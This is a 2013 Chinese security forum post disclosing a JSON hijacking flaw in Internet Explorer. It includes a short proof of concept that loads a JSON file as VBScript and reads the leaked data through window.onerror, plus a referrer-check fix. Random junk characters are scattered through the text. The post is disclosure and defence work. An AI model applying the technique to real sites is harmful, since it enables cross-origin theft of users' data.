找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2105|回复: 0
打印 上一主题 下一主题

IE通用JSON劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 11:33:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:' }/ i% y' p, D1 p- f4 H0 b1 ]

1 e( r% x! t! U, w* r由于某些资源容器对数据处理不当导致json劫持漏洞.
& U, ?" z  C4 o5 h: p+ u% j详细说明:! m1 o, ^" S& T- U
由于ie支持vbscript,所以script元素可以指定成vbscript语言:
( N* b: G) _0 l( g<script language=vbscript></script>8 z6 O3 k# v9 O& q# C+ @
8 s% L" [/ a" B/ U8 y4 Q* u2 e7 w
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.) B* o4 L8 e" ^
漏洞证明:
9 E: N/ O4 j, h6 U& h- v, ~. _: C<script>6 P5 ?0 ]. H; |( }- m. X
window.onerror=function(_){
4 Q  F* ?& N+ o$ @5 Lalert(_)9 N4 |# o: Q& |! z+ ]
}+ M' q  ~$ v& x& g4 x" ?+ k
</script>) j$ K1 A4 ?+ L+ I) g
<script language=vbscript src=1.json></script>
6 [( H" |( c; I) S
& x% F/ }( c! G; z# m ! H3 F4 o. A. x7 d0 {7 o
1.json:
, i4 _( L# C3 ][{"name":"sogili","age":19}]
( G- M. K6 c9 H' l修复方案:
0 e- {; e9 K6 Q' \网站业务对于这个问题可以通过验证referrer是否为同源来防御
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表